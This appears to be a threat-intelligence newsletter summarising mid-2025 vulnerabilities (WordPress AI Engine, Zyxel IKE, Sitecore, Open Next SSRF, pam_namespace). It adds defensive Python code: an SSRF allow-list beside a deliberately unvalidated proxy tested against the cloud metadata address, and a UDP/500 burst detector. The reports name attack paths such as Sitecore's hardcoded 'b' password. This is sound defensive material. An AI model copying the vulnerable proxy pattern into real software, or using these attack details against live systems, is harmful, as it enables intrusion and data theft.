- WordPress AI Engine Flaw (CVE-2025-5071): Critical Bug Allows Subscriber-Level Account Takeover
A critical vulnerability (CVE-2025-5071) in WordPress’s AI Engine plugin allows subscriber-level users to escalate privileges and take full control of websites. The flaw, with a CVSS score of 8.8, affects sites with Dev Tools and Model Context Protocol (MCP) enabled, bypassing authentication checks via a missing empty-value validation in the MCP access function. Attackers can exploit this to execute commands like wp_update_user, granting administrator rights and enabling malicious actions such as uploading backdoors or injecting phishing content. Patched in version 2.8.4, the vulnerability highlights risk in AI automation tools. Users are urged to update immediately.
Read full article: Securityonline
- ASUS Armoury Crate Vulnerability Lets Hackers Gain System-Level Access on Windows
A critical vulnerability (CVE-2025-3464) in ASUS Armoury Crate software allows attackers to escalate privileges to SYSTEM-level access on Windows systems. The flaw, found in the AsIO3.sys kernel driver, exploits a TOCTOU race condition by bypassing authorization checks via hardcoded hashes and process ID allow lists. Affected versions range from 5.9.9.0 to 6.1.18.0, enabling attackers with local access to execute malicious code, manipulate hardware, or install persistent malware. ASUS confirmed the high-severity flaw (CVSS 8.8) and released patches via its Update Center. While no active exploits are reported, users must update immediately to mitigate risks of data theft, ransomware, or system compromise. The widespread use of Armoury Crate amplifies its threat potential.
Read full article: Gbhackers
- Apache Traffic Server Flaws Allow Access Bypass & Remote DoS
A recent vulnerability report highlights flaws in Apache Traffic Server (ATS) that could allow attackers to bypass access controls and trigger remote denial-of-service (DoS) conditions. The vulnerabilities, identified in components including the ESI plugin and PROXY protocol handling, enable unauthorized access to restricted content and service disruption. Disclosed on June 19, 2025, they pose significant risk to organizations that rely on ATS for caching and reverse-proxy services, where exploitation could lead to data exposure or prolonged outages. The source article restricts full details to verified supporters; ATS operators should track the Apache security announcements for the affected and fixed versions and apply updates as they become available.
Read full article: Securityonline
- Critical Auth Bypass Vulnerability (CVE-2025-51381) Found in KAON KCM3100 Gateways
A critical authentication bypass (CVE-2025-51381, CVSS 9.8) was discovered in KAON KCM3100 Wi-Fi gateways running firmware 1.4.2 and earlier. The flaw lets an attacker on the local network bypass authentication through an alternate access path, gaining administrative access without credentials. Exploitation requires LAN access, for example from a compromised client device or physical entry, and leads to configuration changes, traffic interception, malware deployment, or full control of the network behind the gateway. KAON released firmware 1.4.8 to address the issue and urges immediate updates.
Read full article: Securityonline
- Open Next SSRF Flaw in Cloudflare Lets Hackers Fetch Data from Any Host
A critical server-side request forgery (SSRF) vulnerability (CVE-2025-6087) was identified in the @opennextjs/cloudflare package: the /_next/image endpoint did not validate its url parameter, so attackers could make a vulnerable Next.js site fetch and relay content from arbitrary hosts. Because the relayed response is served from the victim site's own origin, the flaw enabled phishing, domain abuse, and same-origin policy bypass, and it could expose internal services reachable from the deployment. Versions prior to 1.3.0 are affected. Cloudflare mitigated the issue with server-side changes that restrict the endpoint to image content and released patched version 1.3.0. Users are advised to upgrade and to restrict permitted image sources with images.remotePatterns in next.config.js. Researcher Edward Coristine responsibly disclosed the flaw, which was promptly resolved.
Read full article: Gbhackers
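The two controls mentioned above, an allow-list of image sources and an image-only content-type rule, are what separates an image optimiser from an open proxy. The following is an added example, not code from @opennextjs/cloudflare or Next.js: it models an images.remotePatterns-style allow-list (protocol, hostname, pathname with `*` and `**` globs, simplified from the real matcher) and shows the unvalidated endpoint beside the hardened one. The fetch is passed in as a callback and the upstream responses and allow-list entries are constructed so the demo runs offline.

```python
"""Added example, not @opennextjs/cloudflare or Next.js code: the source check an
image-proxy endpoint such as /_next/image needs. Models an
images.remotePatterns-style allow-list (simplified glob matching) and the
image-only content-type rule; fetch is a callback over constructed responses."""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed allow-list in the shape of next.config.js images.remotePatterns.
REMOTE_PATTERNS = [
    {"protocol": "https", "hostname": "cdn.example.com", "pathname": "/assets/**"},
    {"protocol": "https", "hostname": "*.img.example.net", "pathname": "/**"},
]

# Constructed upstream responses standing in for the network: (status, type, body).
FAKE_UPSTREAM = {
    "https://cdn.example.com/assets/logo.png": (200, "image/png", b"\x89PNG..."),
    "https://cdn.example.com/assets/login.html": (200, "text/html", b"<form>"),
    "http://169.254.169.254/latest/meta-data/": (200, "text/plain", b"ami-id"),
}


def fake_fetch(raw: str):
    return FAKE_UPSTREAM.get(raw, (404, "text/plain", b""))


def _glob_to_regex(glob: str, segment_chars: str) -> re.Pattern:
    """'**' matches across segments; '*' matches within one segment."""
    out, i = "", 0
    while i < len(glob):
        if glob.startswith("**", i):
            out += ".*"
            i += 2
        elif glob[i] == "*":
            out += f"[{segment_chars}]*"
            i += 1
        else:
            out += re.escape(glob[i])
            i += 1
    return re.compile(f"^{out}$")


def _matches(pattern: dict, url) -> bool:
    host_re = _glob_to_regex(pattern["hostname"], r"^.")            # '*' = one DNS label
    path_re = _glob_to_regex(pattern.get("pathname", "/**"), r"^/")  # '*' = one path segment
    return (url.scheme == pattern.get("protocol", url.scheme)
            and host_re.match(url.hostname or "") is not None
            and path_re.match(url.path or "/") is not None)


def is_allowed_source(raw: str) -> bool:
    url = urlparse(raw)
    if url.scheme not in ("http", "https") or not url.hostname or url.username:
        return False                      # no file:, data:, or user@host tricks
    try:
        ipaddress.ip_address(url.hostname)
        return False                      # IP literals never satisfy a hostname pattern
    except ValueError:
        pass
    return any(_matches(p, url) for p in REMOTE_PATTERNS)


def proxy_image_vulnerable(raw: str, fetch):
    """Before: whatever ?url= names is fetched and relayed under the site's origin."""
    return fetch(raw)


def proxy_image_hardened(raw: str, fetch):
    """After: allow-listed source, then only an image response is relayed."""
    if not is_allowed_source(raw):
        return 400, "text/plain", b"source not allowed"
    status, ctype, body = fetch(raw)
    if status != 200 or not ctype.lower().startswith("image/"):
        return 502, "text/plain", b"upstream did not return an image"
    return 200, ctype, body


if __name__ == "__main__":
    target = "http://169.254.169.254/latest/meta-data/"
    print("vulnerable:", proxy_image_vulnerable(target, fake_fetch)[0])
    print("hardened:  ", proxy_image_hardened(target, fake_fetch)[0])
```

The content-type check matters even with a good allow-list: a trusted CDN that also hosts HTML would otherwise let an attacker serve a login page from the victim's domain, which is the phishing angle the article describes.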
- Veeam Vulnerabilities Expose Backup Servers to Remote Attacks
Veeam disclosed three vulnerabilities in its backup software, one of them critical, posing risks of remote code execution and privilege escalation. CVE-2025-23121 (CVSS 9.9) allows any authenticated domain user to execute arbitrary code on a domain-joined Backup & Replication server. CVE-2025-24286 (CVSS 7.2) enables users holding the Backup Operator role to modify backup jobs so that they execute arbitrary code, a lateral-movement risk. CVE-2025-24287 (CVSS 6.1) permits local users on Windows hosts running Veeam Agent to escalate privileges. Affected products are Veeam Backup & Replication 12.3.1.1139 and earlier and Veeam Agent for Microsoft Windows 6.3.1.1074 and earlier; fixes ship in versions 12.3.2 and 6.3.2 and should be applied urgently. Because a domain-joined backup server makes CVE-2025-23121 reachable from every domain account, the recommended hardening of isolating backup infrastructure and not joining backup servers to the production domain is the key compensating control.
Read full article: Gbhackers
- Zyxel Devices Under Attack as Hackers Exploit UDP Port RCE Flaw
A coordinated global campaign targeted Zyxel firewall/VPN devices on June 16, 2025, exploiting the critical remote code execution vulnerability CVE-2023-28771 (CVSS 9.8) over UDP port 500. The flaw lies in the IKE (Internet Key Exchange) packet handler, so attackers send crafted IKE packets to run commands on unpatched devices without authentication. The synchronized attacks came from 244 previously unseen IP addresses geolocated to the U.S., although UDP source addresses can be spoofed, and targeted organizations in the U.S., U.K., Spain, Germany, and India. Payload evidence points to Mirai botnet variants, meaning compromised devices are conscripted into DDoS networks. Mitigations include applying the firmware fixes Zyxel released in 2023, blocking the reported source IPs, not exposing UDP/500 (and UDP/4500 for NAT traversal) to the internet unless IKE is required and then restricting it to known peers, and monitoring for post-exploitation activity. That a two-year-old vulnerability is still being exploited at scale underscores the patch management gap among Zyxel users.
Read full article: Gbhackers
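The campaign's signature, many never-before-seen sources hitting UDP/500 within seconds of each other, is something a perimeter log can reveal before any device is confirmed compromised. The detector below is an added example written for this newsletter, not from the article, Zyxel or any vendor: it parses firewall log lines, ignores the site's known IKE peers, and raises an alert for any window in which the number of distinct, previously unseen sources reaching UDP/500 crosses a threshold. The log format and field names, the known-peer list, the window and threshold values, and the sample lines (RFC 5737 documentation addresses) are all constructed for the demo.

```python
"""Added example, not from the newsletter or any vendor: detection logic for a
synchronised burst of UDP/500 (IKE) connections from source IPs never seen
before. Log format, field names, known-peer list and sample lines are
constructed for the demo; the log is assumed to be in time order."""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>\w+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$")

# Constructed firewall log excerpt: two known peers, TCP noise, one repeated
# source, eight new sources in eight seconds, and one lone new source later.
SAMPLE_LOG = """\
2025-06-16T09:12:00Z src=203.0.113.10 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:01Z src=192.0.2.11 dst=198.51.100.5 proto=tcp dport=443 action=allow
2025-06-16T09:12:02Z src=192.0.2.21 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:02Z src=192.0.2.22 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:03Z src=192.0.2.23 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:03Z src=192.0.2.24 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:04Z src=192.0.2.25 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:05Z src=192.0.2.21 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:05Z src=192.0.2.26 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:06Z src=192.0.2.27 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:07Z src=192.0.2.28 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:12:30Z src=203.0.113.11 dst=198.51.100.5 proto=udp dport=500 action=allow
2025-06-16T09:20:00Z src=192.0.2.99 dst=198.51.100.5 proto=udp dport=500 action=allow
"""
KNOWN_PEERS = {"203.0.113.10", "203.0.113.11"}   # constructed: the site's real VPN peers


def parse_line(line: str):
    """Return a dict of fields for a well-formed line, None otherwise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["dport"] = int(ev["dport"])
    return ev


def detect_ike_burst(log_text: str, known_peers: set,
                     window_seconds: int = 60, threshold: int = 5) -> list:
    """One alert per tumbling window in which at least `threshold` distinct,
    previously unseen sources reached UDP/500. A source counts once: known
    peers and repeats are skipped, so a slow steady trickle never alerts."""
    seen = set(known_peers)
    buckets = []                      # each: {"start", "end", "sources"}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["proto"] != "udp" or ev["dport"] != 500:
            continue
        if ev["src"] in seen:
            continue
        seen.add(ev["src"])
        span = timedelta(seconds=window_seconds)
        if buckets and ev["ts"] < buckets[-1]["start"] + span:
            buckets[-1]["sources"].append(ev["src"])
        else:
            buckets.append({"start": ev["ts"], "sources": [ev["src"]]})
        buckets[-1]["end"] = ev["ts"]
    return [{"start": b["start"], "end": b["end"],
             "distinct_new_sources": len(b["sources"]), "sources": b["sources"]}
            for b in buckets if len(b["sources"]) >= threshold]


if __name__ == "__main__":
    for alert in detect_ike_burst(SAMPLE_LOG, KNOWN_PEERS):
        print(f"{alert['start']:%H:%M:%S}-{alert['end']:%H:%M:%S}: "
              f"{alert['distinct_new_sources']} new sources on UDP/500: "
              f"{', '.join(alert['sources'])}")
```

On a real perimeter the known-peer set should come from the VPN configuration rather than be typed in, and the threshold tuned against a week of baseline; a firewall that legitimately terminates tunnels from roaming clients will see more new IKE sources than one with a fixed set of site-to-site peers.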
- Sitecore CMS flaws let attackers brute-force ‘b’ for backdoor
Security researchers disclosed three vulnerabilities in Sitecore Experience Platform (XP) that can be chained for full system compromise: a hardcoded credential (the password “b” on a built-in account), a path traversal in ZIP unpacking, and an unrestricted file upload. Chained, they give remote code execution (RCE) without any legitimate credentials, and the Sitecore PowerShell Extensions add-on provides a further upload path. More than 22,000 Sitecore instances were exposed, including deployments at enterprises such as United Airlines and Microsoft. Fixes were released in version 10.4 (May 11), but Sitecore's own documentation historically discouraged changing the default credentials, which increased the risk. The findings highlight systemic gaps in widely used enterprise CMS platforms: default accounts, upload handlers, and archive extraction remain recurring root causes.
Read full article: Theregister
- Root Access Unlocked: How a pam_namespace Flaw Lets Attackers Elevate Privileges on Linux
A vulnerability in the Linux PAM module pam_namespace allows local attackers to escalate privileges to root through a race condition combined with symlink attacks. The flaw stems from improper handling of user-controlled paths when the module sets up per-user (polyinstantiated) directories as root during session initialization: an unprivileged user can race that step and redirect it through a symlink, bypassing the intended checks. Successful exploitation yields local privilege escalation (LPE) to root, a significant risk on multi-user systems. The vulnerability affects default configurations on multiple Linux distributions. Researchers emphasize urgent patching, as the preconditions for exploitation are minimal. The finding highlights the recurring risk of time-of-check-to-time-of-use bugs in privileged code that operates on paths under user control.
Read full article: Securityonline
In-Depth Expert CTI Analysis
Recent cyber threat intelligence highlights intensified global law enforcement collaboration disrupting major darknet markets and ransomware operations, exemplified by Operation Deep Sentinel and international extraditions. Sophisticated ransomware-as-a-service models (Qilin, Anubis) and state-aligned APTs (BlueNoroff, Lazarus) demonstrate evolving tactics, including AI-driven social engineering and macOS malware. Critical vulnerabilities in widely used platforms (Cisco ClamAV, ASUS Armoury Crate, WordPress AI Engine) underscore systemic security risks, while high-impact breaches (Krispy Kreme, Zoomcar, 23andMe) reveal persistent gaps in data protection. Cybercriminal innovation converges with traditional organized crime in hybrid operations, evidenced by Thai ransomware-gambling hubs. Proactive defense measures and rapid patching remain critical as threat actors exploit both technical weaknesses and human vulnerabilities across sectors.
Proactive Defense and Strategic Foresight
Proactive defense and strategic foresight are critical in mitigating evolving cyber threats, as evidenced by recent incidents. Operation Deep Sentinel and international ransomware arrests demonstrate the necessity of preemptive collaboration to dismantle criminal infrastructure. Vulnerabilities like CVE-2025-3464 (ASUS) and CVE-2025-23171 (Versa Director) underscore the urgency of timely patching and rigorous vendor risk management. Emerging tactics—AI-driven deepfakes, fileless malware, and hybrid physical-digital operations—demand adaptive defenses, including behavioral analytics and zero-trust frameworks. The 23andMe breach and FCA data leaks highlight systemic failures in access controls and insider threat mitigation. Organizations must prioritize threat intelligence sharing, continuous attack surface monitoring, and investments in AI-driven detection to counter advanced adversaries like Qilin and BlueNoroff. Strategic foresight requires anticipating adversarial innovation while hardening critical infrastructure against cascading impacts.
Evolving Ransomware and Malware Tactics
Ransomware and malware tactics continue to evolve, blending technical sophistication with psychological manipulation. Recent operations highlight the rise of double extortion, where attackers encrypt data and threaten leaks, as seen in the Play ransomware attack on Krispy Kreme. Groups like Qilin and Anubis now employ RaaS models, Rust-based malware, and irreversible data destruction (“wipe mode”) to maximize impact. Social engineering has advanced with AI-generated deepfakes (BlueNoroff) and search parameter hijacking to deceive victims. Malware variants increasingly exploit trusted platforms, such as weaponized Android apps (Godfather) and fileless PowerShell scripts (AsyncRAT), while APTs like Lazarus target vulnerabilities in critical infrastructure. The convergence of cybercrime with traditional organized crime, evidenced in hybrid ransomware-gambling operations, underscores the need for proactive defense strategies, including zero-trust frameworks and enhanced threat intelligence sharing.
State-Sponsored and Organized Cybercrime Convergence
The convergence of state-sponsored and organized cybercrime is increasingly evident, with nation-states leveraging criminal tactics (e.g., North Korea’s BlueNoroff using deepfakes for crypto theft) and cybercriminals adopting advanced tools (e.g., Qilin ransomware’s RaaS model). Operations like Ukraine’s extradition of ransomware actors and Thailand’s raid on hybrid cybercrime-racketeering hubs underscore blurred lines between geopolitical agendas and profit-driven crime. Paragon’s Graphite spyware, linked to Italian government surveillance, exemplifies dual-use tools enabling both state repression and criminal exploitation. This symbiosis amplifies threats, necessitating global collaboration to counter evolving hybrid adversaries.
Operational and Tactical Implications
- Law enforcement’s cross-border collaboration and cryptocurrency-tracing capabilities are disrupting darknet markets and ransomware groups, pushing threat actors toward heavier obfuscation such as multi-layered laundering networks and encrypted communication.
- Ransomware-as-a-Service (RaaS) models and macOS-targeting malware highlight evolving attacker TTPs, requiring organizations to prioritize phishing-resistant MFA, endpoint detection, and air-gapped backups to mitigate encryption and data exfiltration risks.
- Insider threats and third-party vulnerabilities (e.g., HealthEC, 23andMe) underscore systemic risks in supply chains and privileged access management, demanding stricter vendor audits, zero-trust architectures, and real-time behavioral monitoring.
- State-aligned APTs and commercial spyware (e.g., Graphite, BlueNoroff) exploit zero-day vulnerabilities and deepfakes, compelling enterprises to adopt Lockdown Mode, memory scanning, and AI-driven anomaly detection for high-value targets.
- Convergence of cyber-physical criminal operations (e.g., Thai ransomware gambling hubs) and critical infrastructure attacks (WestJet, NHS) require integrated defense strategies combining network segmentation, physical security audits, and cross-sector threat intelligence sharing.
Forward-Looking Recommendations
- Enhance international collaboration frameworks to disrupt darknet markets and ransomware operations through shared intelligence and coordinated takedowns.
- Prioritize zero-trust architectures and mandatory patch management to mitigate zero-click exploits, spyware, and critical vulnerabilities in widely used software.
- Strengthen third-party vendor risk assessments, particularly in healthcare and critical infrastructure, with enforceable compliance audits and real-time monitoring.
- Adopt AI-driven behavioral analytics and phishing-resistant MFA to counter evolving social engineering, deepfake, and credential-stuffing campaigns.
- Implement immutable offline backups and regular ransomware response drills to counter double extortion and data-wiping tactics like Anubis’ “wipe mode.”
- Expand blockchain forensic capabilities and enforce stricter crypto transaction regulations to combat laundering networks and high-value theft.
- Mandate privileged access reviews and continuous monitoring to mitigate insider threats, coupled with strict data loss prevention policies.
- Accelerate adoption of memory-safe languages (e.g., Rust) and secure-by-design principles in software development to reduce exploit risks.
- Deploy deception technologies and network segmentation to detect APT lateral movement and hybrid cyber-physical criminal operations.
- Establish cross-sector incident response alliances with governments to fortify critical infrastructure against disruptive attacks.